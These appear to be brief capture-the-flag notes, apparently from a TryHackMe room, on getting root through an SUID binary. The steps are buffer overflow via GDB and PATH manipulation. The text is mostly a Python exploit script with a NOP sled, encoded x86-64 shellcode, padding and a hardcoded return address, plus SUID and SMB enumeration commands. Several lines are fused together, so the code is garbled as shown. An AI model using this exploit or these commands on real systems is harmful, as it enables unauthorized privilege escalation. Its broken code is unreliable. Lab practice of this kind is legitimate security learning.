Exploit an SUID bit file, use GNU debugger to take advantage of a buffer overflow and gain root access by PATH manipulation.

enum4linux -A <IP>
find / -perm -u=s -type f 2>/dev/null
x/100x $rsp
from struct import packpayload_len = 616
nop = b"\x90"*200
new_rip = pack("<Q",0x7fffffffe2d4) #selected randomly near the start of the stack
buf = b""
buf += b"\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48\x8d\x05"
buf += b"\xef\xff\xff\xff\x48\xbb\x32\xa3\x67\xe0\x79\x51\x8b"
buf += b"\x33\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4"
buf += b"\x58\x8a\x3f\x79\x13\x53\xd4\x59\x33\xfd\x68\xe5\x31"
buf += b"\xc6\xc3\x8a\x30\xa3\x76\xbc\x73\x53\xa2\x92\x63\xeb"
buf += b"\xee\x06\x13\x41\xd1\x59\x18\xfb\x68\xe5\x13\x52\xd5"
buf += b"\x7b\xcd\x6d\x0d\xc1\x21\x5e\x8e\x46\xc4\xc9\x5c\xb8"
buf += b"\xe0\x19\x30\x1c\x50\xca\x09\xcf\x0a\x39\x8b\x60\x7a"
buf += b"\x2a\x80\xb2\x2e\x19\x02\xd5\x3d\xa6\x67\xe0\x79\x51"
buf += b"\x8b\x33"
shellcode = bufshellcode_len = len(shellcode)
nop_len = len(nop)
padding = b"A"*(payload_len-shellcode_len-nop_len)
payload = [
nop,
shellcode,
padding,
new_rip
]
payload = b"".join(payload)
print(payload)
kel@THM_exploit:~$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
kel@THM_exploit:~$

Just a hacker looking for fun